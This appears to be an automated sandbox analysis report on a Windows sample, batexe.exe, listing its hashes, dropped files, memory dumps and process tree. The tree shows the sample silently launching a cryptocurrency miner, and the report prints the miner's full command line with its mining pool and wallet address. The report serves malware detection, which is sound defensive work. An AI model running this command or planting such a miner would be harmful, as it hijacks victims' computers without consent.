73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
302s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 06:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2052	b2e.exe
3968	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3756-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 3756 wrote to memory of 2052	3756	batexe.exe	72
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 2052 wrote to memory of 3604	2052	b2e.exe	73
PID 3604 wrote to memory of 3968	3604	cmd.exe	76
PID 3604 wrote to memory of 3968	3604	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3756
- C:\Users\Admin\AppData\Local\Temp\D69.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D69.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D69.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12F6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12F6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\D69.tmp\b2e.exe

Filesize
1.3MB

MD5
b33852f26433edfbe5b4da772ce50689

SHA1
79da43d246b039a2b4a04610bac99aaccd1fbcb4

SHA256
03109d08aec8d4271795bb2bfa962a0263462c17eb206b3399c279523b411ef4

SHA512
0c98fa12c2accbfd0ec416b5cafb8cba7b71ad9dacb5fd27f26403f6df0a7a6dec8fc03ba2d2b86d6fa908ff56bdf20388387cb2b883b774732cf1d1e5ff264d

Download Submit
C:\Users\Admin\AppData\Local\Temp\D69.tmp\b2e.exe

Filesize
955KB

MD5
5caef27ac1f3832f85ad6c4443a3d7b1

SHA1
613859dabec2d0fa5ee5ea29efee884597f3330d

SHA256
1137a05e26d8fd18cd9c96253aec4a240e5d9201667be7c1159e6877d7affce0

SHA512
e2b20c5d99c0224dfaabf6e88df07d2ee41bd6dddb99b2d1af0c4d49eaab063c90433276506d71cff06f03826d219a5b56d38c8a547137568dcb9785792bba51

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
193KB

MD5
bcaa54da4fc88318bfd82c18a7d4e412

SHA1
fc8ffac36d129b8397376ef7aaefe4486086e766

SHA256
a577bc544926170a15db4e3fa0d0c9d752469cedbf67e617d33afbb44cd1ae0c

SHA512
b378bee5d9e43f80a3d122ad3dc83ece723597efa37ecc26a8503aeb26aaf3cd8b3bf6928d3261bec76f5c0251d570b5e31c1bb5ed12ef784e70c4d9cfa93675

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
211KB

MD5
9b66d381f2f162732bb2ff4114166d4c

SHA1
1f5b25570218b67839279bec7682eaad9b228473

SHA256
7e3cc6981c7528fa61e03945a2cacc9ae223a2052b1c44e9efe59fe7b6f74b44

SHA512
68c8c650e7c19bcc18fac21d4050490bb7b59beff4bbd5457a66fe2c9a547d70db52172123890de92f2804680ff6f2f8f7c7f25173a61cf3f8f38ba93fafba33

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
269KB

MD5
8a41353e15054aa31628e91f7651640f

SHA1
f1f0c1629f5dbf5c04ff17015d079adc6d7bb464

SHA256
818ddc4c567a06aaa0c00c731ac0c2502b24b9a94f81b2ddd7288b1bfa5ede62

SHA512
a8508f2834e6382869c5e294ad155d4f16c8588202add11b96e93d99bc63c3e82e4a19173ab97d9c5ba460170310b3d368aaef84aad5fea1f0019d0e87374c7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
336KB

MD5
95618f7fa9b95e10d1c8495c1462bb9d

SHA1
7e015a7b1902521952e51d891176c3944d0a2f31

SHA256
2ca1cd46a36b75adea50e12b8ca7ae9f2c4f5e6f425fce1a885f81b454accfbe

SHA512
b32f9ca0c47ad08160005dc4e14e82a4f40be326c8916f0d1d922884dcde30d5b02f90db563e47741b5c760bcddbe403ad50a4acb2fcb83c07b16e0e7f43ce50

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
286KB

MD5
19727419885ca380ca89a39679407224

SHA1
90475b446cdf0e572851de9a6d6ff5923f5a2cfc

SHA256
222805a933750399ca48df4a7792502a5a3ab1cb66448fdcbd13f41b75305cc5

SHA512
65838d2712166501afd38db1c011cf02caa6985ae3252f82a09fdb442613c278cdfedce0282b70737d9cab694ee48b1072a4e7f30d2e4bdd264173cd4cd63af9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
215KB

MD5
66a65b611f68e7aa15e353a1cf6f561e

SHA1
c0f7462393889b25c974b054c8eac9f58bf60213

SHA256
028813f25bb6e178361ea736ea51cf090c9a20cafa5aa990f1e4045f4c9901a3

SHA512
888a609f70e0b281fa7243a59644833df1c75448f7154607f65c69d50f7d13fd30e3e5320a2508ad7b4c622ffff4a02618b58b154516cb234a745af47b18ece3

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
359KB

MD5
046828b064a8b3c9be64321e87d33389

SHA1
4159e97db3033dcaf4e3c3f4c47001967e9ac09a

SHA256
dd42f25524614fd79155b35763680e0e1d2bf41cd783a68f5381f29c54bb774e

SHA512
2e235ce8076f894be24695c94deaf1d4d50d08f1e0e28670763cf87a8df307b652493f9c92107ee1abc91f57a59f99503308b0e7d4e2e31f1682e13f869ab133

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
357KB

MD5
8a2decce023eee5eaaa3be286d633a16

SHA1
b2d986b5ccf7fbf321b3e265771469da6bf6611d

SHA256
a80a4e0d669cdb83c9d18aa5c33951b7eb7b54bf97f0175137dfc3f8e2a0286c

SHA512
3ad5fc5da4e99f2837e05d8c8ef42278edc6da7532e39760ea277d550cad9746cb015235f1428c6af780a7d24392583b158f05e055856aa8b1e5e733d199bcb1

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
198KB

MD5
dc2540b44fae2aac66ce9477935ec431

SHA1
e30f4b1d93633b23a534e52711df39b39943a13c

SHA256
db28779fcfdae3a5ab44d1fb54c9d90e22115b82cdef81438823d3539ad689a3

SHA512
1c0fc0637b6e4250e7afc83dcfc6ab635c7e3a10c990600cddcc5327ca996e5583e1202097062dcaf6848d2cb477c707fd63b32721024fb6aadc63857d5a8e70

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
212KB

MD5
fb5c70ec8fc0ec4b7cd3f5db5e22cd26

SHA1
7d74d31536d226170c7e0c537552305bd44743e7

SHA256
059c94625565b6f40ca9e6a598fd79b612e170891a00483e6fa194ed83730ad8

SHA512
2c7f912322652055c6063bec853404f1f86fd3220f259ad5997f9167a9f8012a40d724cd169d511b5cb488c31c545d1694f2753c891278ae1957bba1812ce33b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
124KB

MD5
d9c6f8520757d007523efa3fff273239

SHA1
49688924953b2af8871543f841177b8028da1633

SHA256
71db08e4a8b143e1a62b60a32a1eb8e33058710daf2421a5dcd966e249d5e279

SHA512
7002f445f1a3f3c92c6886de401624b579e46740ac4860d06f27a287e11837d7b1d3fa1e44b09f70ac0908e71c91a51f0e874a0dab77c5fadf2471c22e539d81

Download Submit
memory/2052-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2052-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3756-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3968-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3968-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/3968-44-0x0000000001080000-0x0000000002935000-memory.dmp

Filesize
24.7MB

Download
memory/3968-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3968-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download